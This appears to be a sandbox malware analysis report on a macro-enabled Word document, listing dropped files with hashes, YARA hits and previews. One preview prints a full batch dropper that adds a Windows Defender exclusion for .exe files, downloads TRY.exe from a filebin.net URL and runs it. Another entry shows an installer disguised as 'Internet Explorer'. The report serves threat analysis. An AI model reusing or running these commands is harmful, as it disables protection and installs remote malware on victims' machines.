C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02CF5D71-875F-4179-8CDC-9768D4E5C0E6}.tmp

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\thai.bat

Download File
Process:C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):192
Entropy (8bit):5.038473612824116
Encrypted:false
SSDEEP:3:mKDDGKSSJJFIGtxVfHeGAFddGeWLERy44ASVOGSJJFIGtATH3x85MHVWfILGYgPe:hSG8G3V/eGgdEWRy44ASQ98GSLh8uWfi
MD5:0187F7CF14FF509BAFFEEDC6909AEF04
SHA1:01689D0CD0070F66D2FA1465E79C43641A52574D
SHA-256:C63EB9290E361D2474C8C8EA29869CA413005CC033146B54E30C3363C5B81170
SHA-512:63C8B8F1214172258D137FBD166912A17053A032CCFBE188E71369A10D4D8F5F8CF97A109BC7E0C8DE19EADF7A29855A224C2092887191F8F38974012BB66F2F
Malicious:false
Preview:@echo off..powershell -command "Set-MpPreference -ExclusionExtension ".exe"..powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"..start TRY.exe

C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files.cab

Download File
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:Microsoft Cabinet archive data, 155244 bytes, 1 file
Category:dropped
Size (bytes):155244
Entropy (8bit):6.820072420859643
Encrypted:false
SSDEEP:3072:avGygixtiq1P5GWp/icKAArDZz4/9GhbkrNEO1Yq:eUEpKy/90QEc
MD5:2A683F9BE589B6F5581EA6298C95AFBC
SHA1:B78112E20E2E465B58D803BF93ED458FE8492161
SHA-256:8A64B66F67D4C199154659B5BB448173B46C1ADB1B2F9AE24CEFF17C858B96D5
SHA-512:731B78A6DAABD45E375681F6CE60FD42A429C655EE93784B4599DDE78936DB307370A96D64F6B289DBDBA033F18B192F6DD47720E4976F6ABF5B49B3490348D9
Malicious:false
Preview:MSCF....l^......,...............}?..D........^.........T.. .TRY.exe..`.(....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B............................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmp

Download File
Process:C:\Windows\SysWOW64\expand.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):155136
Entropy (8bit):6.821026780783546
Encrypted:false
SSDEEP:3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
MD5:96DF7B0C491646EFC2E5F2E9F0443B8B
SHA1:560F0295ABE71FEFFF38912C1121B27E40237FE5
SHA-256:4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
SHA-512:E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)

Download File
Process:C:\Windows\SysWOW64\expand.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):155136
Entropy (8bit):6.821026780783546
Encrypted:false
SSDEEP:3072:fvGygixsiq1P5GWp1icKAArDZz4N9GhbkrNEk1Yq:BvEp0yN90QEm
MD5:96DF7B0C491646EFC2E5F2E9F0443B8B
SHA1:560F0295ABE71FEFFF38912C1121B27E40237FE5
SHA-256:4B61C222D3F7CCF59F510B0780B3907FA71A7AA5EA68B9B966C69157444E78F7
SHA-512:E9CD488EAB24A8D7860F363BF1F84B8205A68017B54F049489EF4FBD77EC51A1BFCF62219A8BC027BD7D103ED347DE3A4AFB138A2BFA609E081B7153D3C84DD6
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b1F.._..._..._..kZ..._..k\..._..k[..._..k^..._...^.d._..kW..._..k...._..k]..._.Rich.._.................PE..d.....&.........."......t...........y.........@.....................................H....`.......... ......................................,................................... .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............\..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\msiwrapper.ini

Download File
Process:C:\Windows\SysWOW64\msiexec.exe
File Type:data
Category:dropped
Size (bytes):1412
Entropy (8bit):3.6357831688439908
Encrypted:false
SSDEEP:24:f3dX8DW8dfja/0vZ4MBlolESIFEqHmnqHmLyDqHmVo+TGTlh+Bl/rB:fe7Z4MB6lmFxGqGL7GjklS/V
MD5:CE0A48B68AFABF1CB63A84452E99662A
SHA1:D79EB8F957A252FB363FF36F67B39E1FA1524468
SHA-256:4C86CD17EDA9F4A42B361023E7AE6E1CCCEE9AEB547F375A3D2936217A5ED713
SHA-512:AB8D97D03F2EF4BE45CD7CEABE8ACE93FF9266BFCA6CB4D939A06F9E8A57343C5CE559BDB004A4D81ABAC3AB7ADE9B6D9761014B0F60A27871FB60E0E8CC6B16
Malicious:false
Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.a.d.m.i.n.i.s.t.r.a.t.o.r.s...B.a.s.e.N.a.m.e.=.T.R.Y...e.x.e...C.a.b.H.a.s.h.=.8.a.6.4.b.6.6.f.6.7.d.4.c.1.9.9.1.5.4.6.5.9.b.5.b.b.4.4.8.1.7.3.b.4.6.c.1.a.d.b.1.b.2.f.9.a.e.2.4.c.e.f.f.1.7.c.8.5.8.b.9.6.d.5...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.S.O.U.R.C.E.D.I.R.*...U.I.L.e.v.e.l.=.2...F.o.c.u.s.=.n.o...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.5.8.b.8.4.a.1.d.-.9.a.6.6.-.4.a.e.e.-.8.a.4.3.-.f.e.b.2.0.6.e.0.8.9.b.1.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.5.8.b.8.4.a.1.d.-.9.a.6.6.-.4.a.e.e.-.8.a.4.3.-.f.e.b.2.0.6.e.0.8.9.b.1.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.r.a.m.e.t.e.r.s.=...R.u.n.A.f.t.e.r.I.n.s.t.a.

C:\Users\user\AppData\Local\Temp\~DF471414B699306DAC.TMP

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF79ACBA3F38B53A85.TMP

Download File
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):512
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:false
Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):26624
Entropy (8bit):4.023285459983812
Encrypted:false
SSDEEP:384:G9FbvNwIWWwxN6rX0jb4e/9wCwQDtASlRGfafyZ:80WwGLc4elwx6Gfaf
MD5:AEE6E4E3E1679CAB2BC9711D046AE750
SHA1:EE2D2003C4E7208C030246BE3556934955D33100
SHA-256:C1A2B5412658B2EDD4F423C35439CF69DFFCAD442AA2D786672A925ACAE064E7
SHA-512:0C7723B855F42C78018352BB2533A2B4CD484352A4DECCD7AC5C2D19F067F6448F6E14DFCE182AC8129C091531E4E04B33B3DEF63562967F3D068A04F2D9C86C
Malicious:true
Yara Hits:
  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Nils Kuhnert
  • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, Author: Florian Roth
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0.............................................................................../...............#................... ...!...".......$...%...&...'...(...)...*...+...,...-.......1...........2...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFECA159C20646BB57.TMP

Download File
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:dropped
Size (bytes):69632
Entropy (8bit):0.14963723887749986
Encrypted:false
SSDEEP:48:6o6vwrfddSsPiK3ddSH9ZauSiCPiKe6NPiK:Wvq3/OAWiFt
MD5:AC6A84118D10D91CB02AE02773436BFF
SHA1:A630E822DD052856EDF8D5068E39C683F5BD5644
SHA-256:EF15F83FD5723D8FB1470F93EAE79E858F4DDE5081A2EDE2B9271D915325C478
SHA-512:84AC382BF232FF446F404024FF1CE14AEA8BFD33F7B4CFECC119FDEBD627F5C8ECBD7091047E4D2093730BCF9A63F282E847BF4729610C8D2BD3E43E2C0D521E
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12543_0008858249_FWDOUTSTANDING_20200604.LNK

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Wed Apr 20 15:19:12 2022, length=62976, window=hide
Category:dropped
Size (bytes):1164
Entropy (8bit):4.5147077000165785
Encrypted:false
SSDEEP:24:88/XThOMPG/xfm+oeK8vvBlD+5Dv3qaqtT7qtk:88/XT4xxfRoH8iQaqlqG
MD5:7ADD8F1D611B2857204C2BC42CC44A28
SHA1:AC6C1E2E73C4AD815192F3229B2EB587FB9F1CAA
SHA-256:E9A69AB15E044FE4045CF020AF86328465BDA02B387F8E6CC404D115E27A69A8
SHA-512:626CE7ADFDD6F4B40A404599EC44B79EB95E42D0B6C7B0B21F0F4C6A4F2FC47AB74AE33E9732C0D9AE3A1EFE3E4521C0393E786604362425C20FEDF31F2A97A8
Malicious:false
Preview:L..................F.... ...E....3..E....3...{._.T...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Tg. .12543_~1.DOC.........hT..hT..*...r.....'...............1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\179605\Users.user\Desktop\12543_0008858249_FWDOUTSTANDING_20200604.doc.C.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.5.4.3._.0.0.0.8.8.5.8.2.4.9._.F.W.D.O.U.T.S.T.A.N.D.I.N.G._.2.0.2.0.0.6.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):131
Entropy (8bit):4.970285316783502
Encrypted:false
SSDEEP:3:bDuMJlBPddqc6Kw7XVLR6YVomX1UXWddqc6Kw7XVLR6YVov:bCUPddqc6N7Xy4cXWddqc6N7Xy4y
MD5:AC465E397B58BF09906407F06803641B
SHA1:91C663F69C167B45184DB10BE2368073F56B7DD6
SHA-256:9F3CFAB15CF36A28AFD1552EEEF61449EBD28BEC40F42BA88E2FD86859F3D023
SHA-512:C0BCF40F37E7FAAB60C4822663B95F232003CDF8B701444B741AFB5271410C1FFBC9F76E1D8879470D6A35E557C5C2D370513E993CF7CB626A9750A31B03F65C
Malicious:false
Preview:[folders]..Templates.LNK=0..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..[doc]..12543_0008858249_FWDOUTSTANDING_20200604.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
MD5:C5E24006AFAC8C2659023AD09A07EB0F
SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2L3NA9KPRDQMPGEYZP5Y.temp

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.582679871894779
Encrypted:false
SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
MD5:DB998D75757CC341EFFADCB32C3A3537
SHA1:77438083A9494757CB358471A9D01C1C81010DAA
SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
Malicious:false
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.582679871894779
Encrypted:false
SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
MD5:DB998D75757CC341EFFADCB32C3A3537
SHA1:77438083A9494757CB358471A9D01C1C81010DAA
SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
Malicious:false
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CRATQOCQH2NC42QQ51D9.temp

Download File
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.582679871894779
Encrypted:false
SSDEEP:96:chQCwMqKqvsqvJCwoEz8hQCwMqKqvsEHyqvJCwor6zYeYnHnxyNplUVWxL:c2joEz823Hnor6zYBxyNLxL
MD5:DB998D75757CC341EFFADCB32C3A3537
SHA1:77438083A9494757CB358471A9D01C1C81010DAA
SHA-256:799694B7C9152F99776FE63DC6D0FDB46C41D411BD67814980F38F8CAE40181D
SHA-512:1D2834BB1B0BD037AC058E53A93FA9B13854F686AF6CC36536ADD22B4C648787854587C8E42FC4523ED681C3F4D448214D88883A9AC848DB07FF8CB834DCBA51
Malicious:false
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.doc

Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
MD5:C5E24006AFAC8C2659023AD09A07EB0F
SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...

C:\Windows\Installer\535fae.ipi

Download File
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):20480
Entropy (8bit):1.6013944557991673
Encrypted:false
SSDEEP:48:Ks0AcDHPbuKPiKqQsddSH9ZauSiCPiKejddSsPiKVrpvWo:KsFb6qQ6OAWiq3Pv
MD5:7C98B8E591E539177CC02866DD0D4140
SHA1:620B461823FAF2BBF8F2E9124DA2878D73CF7849
SHA-256:4BA4989BE7C8A499EA5EAB02CA287ECCF89A5BED08F075BE412142776E2B8721
SHA-512:D3E8357262B3884D6C3AA5318070566DB3720AEA6E8D741CB6133DCF90102A8C3174CB369BEEE949CF4E10A7D911D48E3051E474CA32F07C4730FCC195297567
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI5B5A.tmp

Download File
Process:C:\Windows\System32\msiexec.exe
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 11.0.18362.1, Subject: Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {4982A61C-946D-4168-809C-13FF99C4C351}, Create Time/Date: Thu Feb 18 21:32:30 2021, Last Saved Time/Date: Thu Feb 18 21:32:30 2021, Number of Pages: 200, Number of Words: 2, Name of Creating Application: MSI Wrapper (10.0.50.0), Security: 2
Category:dropped
Size (bytes):491520
Entropy (8bit):6.791342319398629
Encrypted:false
SSDEEP:6144:cytOIiRQYpgjpjew5LLyGx1qo8yppyN90PEGUEpKy/90QEc:cytMRQ+gjpjegLyo8Cy90V4w90i
MD5:260BEC1B34CE96E5ED6C42D51E7146FB
SHA1:57EC75201B4957B5C9F4266264E4A3C953255801
SHA-256:29C51CD98EAE68D4E63941C8CE41EEDAC2FB18500CD00388EE8D29619CA3F160
SHA-512:A8AED798334A8BD35802E3166823D434B292036D5F0BBBE9E2F3587A660F856FF0CE918C8665BD88FCF443BFFA816FDC8EF0D4B13DC5A00CC82D8DC77F50919C
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9F1.tmp

Download File
Process:C:\Windows\System32\msiexec.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):212992
Entropy (8bit):6.513444216841171
Encrypted:false
SSDEEP:3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8
MD5:4CAAA03E0B59CA60A3D34674B732B702
SHA1:EE80C8F4684055AC8960B9720FB108BE07E1D10C
SHA-256:D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D
SHA-512:25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34
Malicious:false
Antivirus:
  • Antivirus: Metadefender, Detection: 0%, Browse
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......`...........!.....h..........K....................................................@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\Logs\DPX\setupact.log

Download File
Process:C:\Windows\SysWOW64\expand.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):969
Entropy (8bit):4.307877893758803
Encrypted:false
SSDEEP:24:a+m2H6Kb2Y76Kb2H6Kb2Y76Kb2Y6m2+m2H6Kb2Y76Kb2Y6r:ck6Kb96Kbk6Kb96Kbb4k6Kb96KbA
MD5:B193C14C2275982386C9C24BE523ED52
SHA1:DFAABC4AC43E7A77882BADE797F5415C6494CF3A
SHA-256:0A685AF3940988A82CE8310FFE0166E9488CF0A20B1A8D4028362E4B305C73C3
SHA-512:606C8EF4FE9AFF788D76B1457D3A309010A0AB6426F27F92658AC44C717EF0D05B8CAE8D20F11F1348178633A0492513D1A9CE4765C3291681D833EA4C1F8BFE
Malicious:false
Preview:.2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..

Static File Info

General

File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 20 03:06:00 2022, Last Saved Time/Date: Wed Apr 20 03:06:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):6.071377383201628
TrID:
